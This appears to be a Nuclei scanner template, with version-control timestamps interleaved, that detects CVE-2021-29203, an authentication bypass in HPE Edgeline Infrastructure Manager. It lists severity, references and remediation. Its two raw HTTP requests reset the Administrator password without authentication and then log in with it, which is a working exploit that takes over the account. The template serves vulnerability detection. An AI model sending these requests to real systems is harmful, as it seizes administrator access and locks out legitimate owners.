2021-06-26 08:10:30 +00:00
id : CVE-2021-29203
2022-04-22 10:38:41 +00:00
2021-06-26 08:10:30 +00:00
info :
2022-05-18 20:58:07 +00:00
name : HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
2021-06-26 08:10:30 +00:00
author : madrobot
severity : critical
2022-05-18 20:58:07 +00:00
description : HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
2022-05-17 09:18:12 +00:00
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-29203
2023-07-11 19:49:27 +00:00
cwe-id : CWE-306
2024-05-31 19:23:20 +00:00
epss-score : 0.95563
epss-percentile : 0.99393
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : hp
product : edgeline_infrastructure_manager
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,hpe,bypass,tenable,hp
2021-06-26 08:10:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-26 08:10:30 +00:00
- raw :
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/json
2021-06-30 15:57:06 +00:00
{"Password" : "{{randstr}}" }
2021-06-26 08:10:30 +00:00
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2021-06-30 15:57:06 +00:00
{"UserName" : "Administrator" , "Password" : "{{randstr}}" }
2021-06-26 08:10:30 +00:00
matchers-condition : and
matchers :
- type : word
2021-06-30 15:57:06 +00:00
part : header
2021-06-26 08:10:30 +00:00
words :
- "X-Auth-Token"
- "PasswordReset"
- "Location"
2023-07-11 19:49:27 +00:00
condition : and
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type : word
part : body
2021-06-30 15:57:06 +00:00
words :
- "Base.1.0.Created"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 201
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022059972e2979656b628d3e8a54cc58c689b33947b93cc382010e811816db56d2be022100f9beab8fd5df408e713824161064279e1ecfa79a857f3043629b6243acabccb8:922c64590222798bb761d5b6d8e72950